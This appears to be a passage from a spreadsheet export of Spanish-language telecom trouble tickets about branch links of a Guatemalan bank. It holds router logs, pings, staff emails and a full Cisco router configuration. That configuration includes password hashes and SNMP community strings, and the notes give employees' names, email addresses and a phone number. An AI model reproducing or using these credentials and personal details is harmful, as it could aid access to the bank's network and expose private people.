MAY 11 23:23:12.626 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 23:27:07.418 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 23:28:12.038 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 00:57:19.145 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:00:36.889 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 01:00:41.905 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:17:07.061 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 01:17:12.105 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:25:58.701 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:40:07.381 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 01:40:12.257 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:42:07.393 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 01:42:12.749 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:53:14.777 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 02:17:57.769 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 02:28:37.741 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 02:28:43.109 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 03:26:07.085 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 03:26:12.329 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 08:13:07.111 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 08:13:12.047 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 11:09:37.443 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 11:09:51.547 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 16:24:36.657 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 16:24:41.885 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 17:18:07.129 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 17:18:17.149 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 17:23:07.205 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 17:23:12.141 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 19:21:04.757 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 19:21:09.669 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 19:25:17.649 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 20:21:09.404 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 21:39:04.852 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 21:39:10.056 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 22:40:30.320 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 22:40:40.364 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 23:24:05.648 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 23:24:10.612 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 01:18:05.327 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 01:18:10.115 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 01:59:05.631 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 01:59:10.655 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 02:23:04.759 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 02:23:09.799 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 02:33:04.855 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 02:33:09.791 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 03:11:35.103 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 03:11:49.067 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0591#
SHOW CLOCK
03:22:01.635 UTC FRI MAY 13 2022
CC_BANRURAL_GT_AGENCIA_0591#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.190.1             3   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.190.60            -   7081.05D7.89C0  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.190.133           -   7081.05D7.89C1  ARPA   GIGABITETHERNET0/1.2249
INTERNET  10.135.91.17            -   7081.05D7.89C3  ARPA   VLAN1
INTERNET  10.135.91.22            0   F08E.DB17.A9E2  ARPA   VLAN1
INTERNET  10.165.91.126           -   7081.05D7.89C3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0591#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          INITIALIZING   DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8901167T/_/
GI0/0.1                        UP             UP       WAN PRINCIPAL/_/8901167T/_/
GI0/1                          UP             UP
GI0/1.2249                     UP             UP       WAN REDUNDANTE/_/8901680T/_/
GI0/0/0                        UP             UP
GI0/0/1                        DOWN           DOWN
GI0/0/2                        DOWN           DOWN
GI0/0/3                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0591#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  INITIALIZING          DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.1       10.72.190.60    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/1.2249    10.72.190.133   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.120.194  YES NVRAM  UP                    UP
VLAN1                      10.165.91.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0591#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.72.190.60
  PING 10.72.190.60: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.190.60 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/3/13 MS
RUTA IP:
PE: 10.179.28.33
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.190.60
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.190.60/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t>F4561919</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 10:31
PARA: CECILIA ARMINDA GONZALEZ PINEDA &lt;CECILIA.GONZALEZP@CLARO.COM.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: EURO TELECOMUNICACIONES SA DE CV | IPG000225SV | SD1125276
BUEN DÍA, ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN DE PUNTO REMOTO.
¿SERVICIO A NIVEL WAN SE OBSERVAN OPERATIVO Y ESTABLE, EN UNA RÁFAGA DE 1000 PAQUETES CON PESO MÁXIMO DE 1500, RESULTANDO EN TIEMPOS MÍNIMO 1 MILISEGUNDO, PROMEDIO 1 MILISEGUNDO Y 10 MILISEGUNDO COMO MÁXIMO.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t xml:space="preserve">
SERVICICO OPERATIVO A NIVEL WAN SE PROCEDE A VALIDAR SI TIENE ALGUN INCONVENIENTE EN LA ULTIMA MILLA PERO NO PRESENTA ALGUNA PERDIDA O CAIDA
&lt;SSSASVYDN3D1EID1&gt;PING -C 500 -S 500 -M 30 -B -VPN-INSTANCE GMULTIMEDIA 10.130.36.117
  PING 10.130.36.117: 500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.130.36.117 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/4 MS
&lt;SSSASVYDN3D1EID1&gt;
PE 10.179.30.19
&lt;SSSASVYDN3D1EID1&gt;DISPLAY CURRENT-CONFIGURATION | INCLUDE 10.130.36.117
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 IP ADDRESS 10.130.36.117 255.255.255.248 SUB
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : GMULTIMEDIA
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.130.36.117/32  DIRECT  0    0             D   127.0.0.1       VLANIF1835
&lt;SSSASVYDN3D1EID1&gt;DISPLAY CURRENT-CONFIGURATION  INTERFACE VLANIF1835
#
INTERFACE VLANIF1835
 DESCRIPTION GERENCIA MULTIMEDIA
 IP BINDING VPN-INSTANCE GMULTIMEDIA
 IP ADDRESS 10.130.36.102 255.255.255.252
 IP ADDRESS 10.130.36.117 255.255.255.248 SUB
 IP ADDRESS 10.130.42.193 255.255.255.248 SUB
 IP ADDRESS 10.130.43.177 255.255.255.248 SUB
 IP ADDRESS 10.130.122.145 255.255.255.248 SUB
 IP ADDRESS 10.130.122.177 255.255.255.248 SUB
 ARP-PROXY ENABLE
#
RETURN</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DEL CLIENTE
DE: CECILIA ARMINDA GONZALEZ PINEDA &lt;CECILIA.GONZALEZP@CLARO.COM.SV&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 12:07
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: EURO TELECOMUNICACIONES SA DE CV | IPG000225SV | SD1125276
BUENOS DIAS ESTIMADOS COMPAÑEROS.
SE SOLICITA VISITA TECNICA PARA CERTIFICACION DE MEDIO. PARA NUESTRO SOCIO EURO COMUNICACIONES. POR LO QUE SOLICITO NO SE CIERRE EL TICKET Y SE REALIZE VISITA ESTE DIA.
DE ANTEMANO MUCHAS GRACIAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARVIN AGUILAR AL 70070421 INDICA QUE LE HABIAN DICHO QUE SE LE ESTARIA REALIZANDO VISITA TECNICA PARA LA CERTIFICACION QUE SOLICITO || SE NOTIFICA A GESTOR**
ID 2001134988
**</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 11:28
PARA: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;; CECILIA ARMINDA GONZALEZ PINEDA &lt;CECILIA.GONZALEZP@CLARO.COM.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: EURO TELECOMUNICACIONES SA DE CV | IPG000225SV | SD1125276
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4561934</t>
  </si>
  <si>
    <t>SE VALIDA QUE EL ESTADO NO CORRESPONDE A PC NO HAY NADA PENDIENTE POR EL CLIENTE Y NO HAY SEGUIMIENTO DESDE LAS  13/05/2022 00:28:10 SE MUEVE A TRABAJO EN CURSO Y SE NOTIFICA AL GESTOR RAMOS.MARLON VIA SKYPE EL CAMBIO</t>
  </si>
  <si>
    <t>F4561984</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 10 MINUTOS)
CISCO IOS SOFTWARE, 1841 SOFTWARE (C1841-IPBASE-M), VERSION 15.0(1)M2, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2010 BY CISCO SYSTEMS, INC.
COMPILED WED 10-MAR-10 21:53 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 12.4(13R)T, RELEASE SOFTWARE (FC1)
CC_BANRURAL_GT_AGENCIA_0041 UPTIME IS 10 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C1841-IPBASE-MZ.150-1.M2.BIN"
LAST RELOAD TYPE: NORMAL RELOAD
CISCO 1841 (REVISION 7.0) WITH 235520K/26624K BYTES OF MEMORY.
PROCESSOR BOARD ID FTX1405YS2C
6 FASTETHERNET INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
191K BYTES OF NVRAM.
62720K BYTES OF ATA COMPACTFLASH (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1841             FTX1405YS2C
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0041#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3378 BYTES
!
VERSION 15.0
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0041
!
BOOT-START-MARKER
BOOT-END-MARKER
!
LOGGING BUFFERED 4096
ENABLE SECRET 5 $1$CTVQ$HGA1QY1BWUSDFBLR1DXXN/
!
NO AAA NEW-MODEL
IP SOURCE-ROUTE
!
!
!
!
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
LICENSE UDI PID CISCO1841 SN FTX1405YS2C
USERNAME GESTIONIP SECRET 5 $1$FMU5$AFL8IO2DFUMUUUDQZ1XSK0
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.97.169 255.255.255.255
!
INTERFACE FASTETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8900340T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.72.193.92 255.255.255.192
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 SPEED 100
 FULL-DUPLEX
!
INTERFACE FASTETHERNET0/1
 DESCRIPTION WAN REDUNDANTE/_/8901752T/_/
 BANDWIDTH 1024
 IP ADDRESS 10.72.193.145 255.255.255.192
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 SPEED 100
 FULL-DUPLEX
!
INTERFACE FASTETHERNET0/0/0
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE FASTETHERNET0/0/1
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE FASTETHERNET0/0/2
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE FASTETHERNET0/0/3
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.130.41.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.160.41.126 255.255.255.0
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
!
ROUTER OSPF 1
 ROUTER-ID 10.72.193.92
 LOG-ADJACENCY-CHANGES
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.193.64 0.0.0.63 AREA 164
!
IP FORWARD-PROTOCOL ND
!
!
NO IP HTTP SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.72.193.129 225 NAME REDUNDANCIA_WX
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.212.97.169/32
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.160.41.0/24
IP PREFIX-LIST CONNECTED SEQ 130 PERMIT 10.130.41.16/29
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION AGENCIA 41 EDIFICIO MUNICIPAL, LA DEMOCRACIA HUEHUETENANGO
!
CONTROL-PLANE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LINE AUX 0
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
END
CC_BANRURAL_GT_AGENCIA_0041#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 3 MESSAGES RATE-LIMITED,
                0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 18 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 18 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    LOGGING EXCEPTION SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
ESM: 0 MESSAGES DROPPED
    TRAP LOGGING: LEVEL INFORMATIONAL, 23 MESSAGE LINES LOGGED
LOG BUFFER (4096 BYTES):
*MAY 13 07:50:53.015: %ESWMRVL_FLTMG-5-NOTICE: NOTICE: FPGA REV 0X71
*MAY 13 07:51:00.503: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY 13 07:51:02.123 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0, CHANGED STATE TO UP
*MAY 13 07:51:02.123 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/1, CHANGED STATE TO UP
*MAY 13 07:51:02.279 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 13 07:51:02.939 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, 1841 SOFTWARE (C1841-IPBASE-M), VERSION 15.0(1)M2, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2010 BY CISCO SYSTEMS, INC.
COMPILED WED 10-MAR-10 21:53 BY PROD_REL_TEAM
*MAY 13 07:51:02.947 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0041 IS UNDERGOING A COLD START
*MAY 13 07:51:03.267 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 13 07:51:03.283 UTC: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.212.97.169 IN NSSA 164 - P-BIT CLEARED
*MAY 13 07:51:04.323 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO UP
*MAY 13 07:51:04.323 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO UP
*MAY 13 07:51:04.323 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO UP
